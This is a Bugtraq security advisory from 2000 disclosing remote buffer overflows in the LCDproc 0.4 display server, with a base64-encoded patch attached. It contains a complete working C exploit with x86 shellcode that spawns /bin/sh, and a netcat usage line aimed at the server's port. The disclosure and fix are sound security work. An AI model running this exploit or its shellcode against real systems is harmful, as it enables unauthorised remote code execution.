Date: Fri, 21 Apr 2000 01:12:18 -0400 From: Andrew Hobgood <chaos@STRANGE.NET> Subject: Remote vulnerability in LCDproc 0.4 To: BUGTRAQ@SECURITYFOCUS.COM This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --3582794174-877119450-956293861=:15318 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: <Pine.LNX.3.96.1000421011113.15318L@schizo.strange.net> -----BEGIN PGP SIGNED MESSAGE----- ============================================================== === Title: Vulnerability in LCDproc === === Date: 20 April 2000 === === Author: Andrew Hobgood <chaos@strange.net> === ============================================================== [ Note: The LCDproc maintainers have been notified of this vulnerability, ] [ and have stated that they are prepared for this advisory to be ] [ released. ] ================= === Specifics === ================= LCDproc (http://lcdproc.omnipotent.net) is a system to display system information and other data on an LCD display (or any supported display device, including curses or text). As of version 0.4, the system utilizes a client/server model for communication, and clients wishing to display data on the LCDproc host device can connect to the LCDproc server and negotiate a session. This system is commonly used in embedded server environments and other locations where system statistics must be available quickly, but space requirements or other restrictions prevent connecting a monitor or other display unit. Also, since it must often communicate with the LCD device, it is commonly installed setuid root or setgid uucp. While this system provides for a highly extensible means of displaying data, the protocol handling code has a few bugs with dire consequences. The vulnerabilities in LCDproc allow an attacker to remotely execute arbitrary code or cause the LCDproc server to crash. Improper boundary conditions exist at various locations in the code, including: [ Note: argv[0] in this context is *not* the argv[] from main(). ] parse.c:149: sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]); screenlist.c:119: sprintf(str, "ignore %s\n", old_s->id); screenlist.c:134: sprintf(str, "listen %s\n", s->id); As well as other locations. ============== === Impact === ============== Any system running LCDproc 0.4 or above (including the 0.4-pre series) that is susceptible to buffer overflow attacks is vulnerable. The exploit below is only for Linux/x86, and has limited attack potential, but that does not mean that the scope of the attack is limited only to that platform. Remote access can be gained as whatever user and group that LCDproc is running as. ========================== === Temporary Solution === ========================== Disable LCDproc, or downgrade to version 0.3 or before, prior to the client/ server implementation in 0.4. There is also a patch included in this message which can be applied against LCDproc version 0.4-pre9 (available from the LCDproc home site at http://lcdproc.omnipotent.net). ================================ === Patch (against 0.4-pre9) === ================================ [ This patch is also available at ] [ http://web.strange.net/patches/lcdproc.20April2000.patch ] (Patch has been attached to this message to prevent linewrapping and other such confusions.) =============== === Exploit === =============== [ Note: This code launches /bin/sh on the remote site. Unfortunately, this ] [ shell is execve()'ed, and inherits the stdin/stdout of the main ] [ LCDproc process, and therefore just runs /bin/sh on the remote ] [ site, instead of over the socket. Blah. I didn't feel like ] [ hacking up shellcode to do something more productive. I'm sure ] [ that someone else much more capable than myself will take care of ] [ that on my behalf. ] /***** * lcdproc-exploit.c ***** * * LCDproc 0.4-pre9 exploit # # Andrew Hobgood <chaos@strange.net> * Kha0S on #LinuxOS/EFnet * * Tested on Linux/x86 2.2.5-15smp (the only Intel box I could get my hands * on for testing). * ***** */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define BUFFERSIZE 269 #define NOP 0x90 #define OFFSET 0xbffff750 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; int main(int argc, char **argv) { char *ptr, buffer[BUFFERSIZE]; unsigned long *long_ptr, offset = OFFSET; int aux; fprintf(stderr, "LCDproc exploit by Andrew Hobgood <chaos@strange.net>\n\n"); fprintf(stderr, "Usage: (%s [<offset>]; cat) | nc <target> 13666\n\n", argv[0]); if (argc == 2) offset += atol(argv[1]); ptr = buffer; memset(ptr, 0, sizeof(buffer)); memset(ptr, NOP, sizeof(buffer) - strlen(shellcode) - 16); ptr += sizeof(buffer) - strlen(shellcode) - 16; memcpy(ptr, shellcode, strlen(shellcode)); ptr += strlen(shellcode); long_ptr = (unsigned long *) ptr; for(aux=0; aux<4; aux++) *(long_ptr++) = offset; ptr = (char *) long_ptr; *ptr = '\0'; fprintf(stderr, "Buffer size: %d\n", (int) strlen(buffer)); fprintf(stderr, "Offset: 0x%lx\n\n", offset); printf("hello\n"); fflush(stdout); sleep(1); printf("screen_add {%s}\n", buffer); fflush(stdout); return(0); } /*** end lcdproc-exploit.c ***/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBOP/jNrVO5F5M77LBAQEW8wQAh9dJRKmc+V/M6K+4a+LK5Har+QiNuaaF IlIQEeMDa/LrmbdZJHMBCjpYSFahGF/1ihBzb0yU2juYlIVLZjD0jo3B8gkQh5mk wWa+18rwNmD8O4H7y/FFqBTWqTDdqpDWiVR3OB4vI0yMiOM7r09TupVTfyzP3z6h QvwIasYme/0= =R713 -----END PGP SIGNATURE----- --3582794174-877119450-956293861=:15318 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="lcdproc.patch" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.3.96.1000421011101.15318J@schizo.strange.net> Content-Description: lcdproc.patch ZGlmZiAtdXIgLi9XSEFUU05FVyAuLi9sY2Rwcm9jLWhhY2tlZC9XSEFUU05F Vw0KLS0tIC4vV0hBVFNORVcJVGh1IE9jdCAyMSAyMDowNDo1OSAxOTk5DQor KysgLi4vbGNkcHJvYy1oYWNrZWQvV0hBVFNORVcJVGh1IEFwciAyMCAxMzo1 Mzo1NCAyMDAwDQpAQCAtMTEsNiArMTEsMTEgQEANCiAgKiBCZXR0ZXIgc3lu dGF4IGZvciBkcml2ZXIgcGFyYW1ldGVycw0KICAqIER5bmFtaWNhbGx5LWxv YWRlZCBkcml2ZXIgc3lzdGVtDQogDQorPj4gUGF0Y2hlZCBmb3IgYnVncyBh cyBmb2xsb3dzIGJ5IEFuZHJldyBIb2Jnb29kIDxjaGFvc0BzdHJhbmdlLm5l dD46DQorICogVGhyZWUgYnVmZmVyIG92ZXJmbG93cyBpbiB2YXJpb3VzIGxv Y2F0aW9ucyBbc2NyZWVubGlzdC5jLCBwYXJzZS5jLCBvdGhlcnNdDQorICog UHJldmVudCB0b28gbWFueSBhcmd1bWVudHMgZnJvbSB3YWxraW5nIG92ZXIg dGhlIGJvdW5kYXJ5IG9mIHRoZSBmaXhlZA0KKyAgIGNsaWVudF9mdW5jIGFy Z3YuDQorDQogVjAuNC1wcmU5Og0KICAqIHNtYWxsIGZpeGVzIGZvciBpcml4 DQogICogQWRkZWQgZmxhZyBpbiBMQ0RkIHRvIHNodXQgb2ZmIHNlcnZlciBz Y3JlZW46ICANCmRpZmYgLXVyIC4vc2VydmVyL2NsaWVudF9mdW5jdGlvbnMu YyAuLi9sY2Rwcm9jLWhhY2tlZC9zZXJ2ZXIvY2xpZW50X2Z1bmN0aW9ucy5j DQotLS0gLi9zZXJ2ZXIvY2xpZW50X2Z1bmN0aW9ucy5jCVRodSBPY3QgMjEg MTg6MTQ6MjEgMTk5OQ0KKysrIC4uL2xjZHByb2MtaGFja2VkL3NlcnZlci9j bGllbnRfZnVuY3Rpb25zLmMJVGh1IEFwciAyMCAxNDoxMjo0MiAyMDAwDQpA QCAtNjgsNyArNjgsNyBAQA0KICAgIA0KICAgIGZvcihpPTA7IGk8YXJnYzsg aSsrKQ0KICAgIHsNCi0gICAgICBzcHJpbnRmKHN0ciwgInRlc3RfZnVuY19m dW5jOiAgJWkgLT4gJXNcbiIsIGksIGFyZ3ZbaV0pOw0KKyAgICAgIHNucHJp bnRmKHN0ciwgMjU2LCAidGVzdF9mdW5jX2Z1bmM6ICAlaSAtPiAlc1xuIiwg aSwgYXJndltpXSk7DQogICAgICAgcHJpbnRmKHN0cik7DQogICAgICAgc29j a19zZW5kX3N0cmluZyhjLT5zb2NrLCBzdHIpOw0KICAgIH0NCkBAIC04OSw3 ICs4OSw3IEBADQogICAgDQogICAgZGVidWcoIkhlbGxvIVxuIik7DQogDQot ICAgc3ByaW50ZihzdHIsDQorICAgc25wcmludGYoc3RyLCAyNTYsDQogCSAg ICJjb25uZWN0IExDRHByb2MgJXMgbGNkIHdpZCAlaSBoZ3QgJWkgY2VsbHdp ZCAlaSBjZWxsaGd0ICVpXG4iLA0KIAkgICB2ZXJzaW9uLCBsY2Qud2lkLCBs Y2QuaGd0LCBsY2QuY2VsbHdpZCwgbGNkLmNlbGxoZ3QpOw0KICAgIHNvY2tf c2VuZF9zdHJpbmcoYy0+c29jaywgc3RyKTsNCkBAIC0xOTMsNiArMTkzLDkg QEANCiAgICB9DQogDQogDQorICAgLy8gdHJ1bmNhdGUgYXJndlsxXSBzbyB0 aGF0IGl0IGNhbid0IGJlIHVzZWQgbGF0ZXIgdG8gb3ZlcmZsb3cgYW55DQor ICAgLy8gYnVmZmVycy4JCQkJQW5kcmV3IEhvYmdvb2QgPGNoYW9zQHN0cmFu Z2UubmV0Pg0KKyAgIGFyZ3ZbMV1bMTI4XSA9IDA7DQogICAgZGVidWcoInNj cmVlbl9hZGQ6IEFkZGluZyBzY3JlZW4gJXNcbiIsIGFyZ3ZbMV0pOw0KICAg IGVyciA9IHNjcmVlbl9hZGQoYywgYXJndlsxXSk7DQogICAgaWYoZXJyIDwg MCkNCmRpZmYgLXVyIC4vc2VydmVyL3BhcnNlLmMgLi4vbGNkcHJvYy1oYWNr ZWQvc2VydmVyL3BhcnNlLmMNCi0tLSAuL3NlcnZlci9wYXJzZS5jCVNhdCBG ZWIgMjAgMjA6NTM6MjMgMTk5OQ0KKysrIC4uL2xjZHByb2MtaGFja2VkL3Nl cnZlci9wYXJzZS5jCVRodSBBcHIgMjAgMTQ6MDY6NTIgMjAwMA0KQEAgLTkz LDEyICs5MywyMSBAQA0KIAkgICAgICAgaWYobmV3dG9rZW4gJiYgc3RyW2ld KQ0KIAkgICAgICAgew0KIAkJICBuZXd0b2tlbj0wOw0KLQkJICBhcmd2W2Fy Z2NdID0gc3RyICsgaTsNCi0JCSAgYXJnYysrOw0KLQkgICAgICAgfQ0KLQkg ICAgICAgZWxzZQ0KLQkgICAgICAgew0KLQkgICAgICAgfQ0KKwkJICAvLyBt YWtlIHN1cmUgdGhhdCB3ZSdyZSBub3QgZ29pbmcgdG8gZ28gb3ZlciB0aGUg Zml4ZWQgDQorCQkgIC8vIG51bWJlciBvZiBhbGxvd2VkIGFyZ3VtZW50cyBp biBhcmd2DQorCQkgIC8vIAkJCUFuZHJldyBIb2Jnb29kIDxjaGFvc0BzdHJh bmdlLm5ldD4NCisJCSAgaWYoYXJnYyA8IDI1NSkgDQorCQkgIHsNCisJCSAg ICBhcmd2W2FyZ2NdID0gc3RyICsgaTsNCisJCSAgICBhcmdjKys7DQorCQkg IH0gZWxzZSANCisJCSAgew0KKwkgICAgICAgICAgICBkZWJ1ZygiVG9vIG1h bnkgYXJndW1lbnRzLCBpZ25vcmluZyBwYXN0IDI1Ni5cbiIpOw0KKwkJICB9 DQorCQl9DQorCSAgICAgICAgZWxzZQ0KKwkJew0KKwkJfQ0KIAkgICAgfQ0K IAkgICAgaWYoaW5xdW90ZSkNCiAJICAgIHsNCkBAIC0xMzUsNyArMTQ0LDkg QEANCiAJICAgIGlmKGludmFsaWQpDQogCSAgICB7DQogCSAgICAgICAvLyBG SVhNRTogIENoZWNrIGZvciBidWZmZXIgb3ZlcmZsb3dzIGhlcmUuLi4NCi0J ICAgICAgIHNwcmludGYoZXJybXNnLCAiaHVoPyBJbnZhbGlkIGNvbW1hbmQg XCIlc1wiXG4iLCBhcmd2WzBdKTsNCisJICAgICAgIC8vIFlvdSB3ZXJlIHJp Z2h0IC0tIHRoZXJlIHdhcyBvbmUgaGVyZS4gPSkgIE1vcmUgb3IgbGVzcyAN CisJICAgICAgIC8vIGZpeGVkOiAJCUFuZHJldyBIb2Jnb29kIDxjaGFvc0Bz dHJhbmdlLm5ldD4NCisJICAgICAgIHNucHJpbnRmKGVycm1zZywgMjU2LCAi aHVoPyBJbnZhbGlkIGNvbW1hbmQgXCIlc1wiXG4iLCBhcmd2WzBdKTsNCiAJ ICAgICAgIHNvY2tfc2VuZF9zdHJpbmcoYy0+c29jaywgZXJybXNnKTsNCiAJ ICAgIH0NCiANCmRpZmYgLXVyIC4vc2VydmVyL3NjcmVlbmxpc3QuYyAuLi9s Y2Rwcm9jLWhhY2tlZC9zZXJ2ZXIvc2NyZWVubGlzdC5jDQotLS0gLi9zZXJ2 ZXIvc2NyZWVubGlzdC5jCUZyaSBNYXIgMTIgMDA6MjA6MzkgMTk5OQ0KKysr IC4uL2xjZHByb2MtaGFja2VkL3NlcnZlci9zY3JlZW5saXN0LmMJVGh1IEFw ciAyMCAxNDowOTowMyAyMDAwDQpAQCAtMTE2LDcgKzExNiw3IEBADQogCSAg ICBjID0gb2xkX3MtPnBhcmVudDsNCiAJICAgIGlmKGMpICAvLyBUZWxsIHRo ZSBjbGllbnQgd2UncmUgbm90IGxpc3RlbmluZyBhbnkgbW9yZS4uLg0KIAkg ICAgew0KLQkgICAgICAgc3ByaW50ZihzdHIsICJpZ25vcmUgJXNcbiIsIG9s ZF9zLT5pZCk7DQorCSAgICAgICBzbnByaW50ZihzdHIsIDI1NiwgImlnbm9y ZSAlc1xuIiwgb2xkX3MtPmlkKTsNCiAJICAgICAgIHNvY2tfc2VuZF9zdHJp bmcoYy0+c29jaywgc3RyKTsNCiAJICAgIH0NCiAJICAgIGVsc2UgIC8vIFRo ZSBzZXJ2ZXIgaGFzIHRoZSBkaXNwbGF5LCBzbyBkbyBub3RoaW5nDQpAQCAt MTMxLDcgKzEzMSw3IEBADQogCSBjID0gcy0+cGFyZW50Ow0KIAkgaWYoYykg IC8vIFRlbGwgdGhlIGNsaWVudCB3ZSdyZSBwYXlpbmcgYXR0ZW50aW9uLi4u DQogCSB7DQotCSAgICBzcHJpbnRmKHN0ciwgImxpc3RlbiAlc1xuIiwgcy0+ aWQpOw0KKwkgICAgc25wcmludGYoc3RyLCAyNTYsICJsaXN0ZW4gJXNcbiIs IHMtPmlkKTsNCiAJICAgIHNvY2tfc2VuZF9zdHJpbmcoYy0+c29jaywgc3Ry KTsNCiAJIH0NCiAJIGVsc2UgIC8vIFRoZSBzZXJ2ZXIgaGFzIHRoZSBkaXNw bGF5LCBzbyBkbyBub3RoaW5nDQo= --3582794174-877119450-956293861=:15318--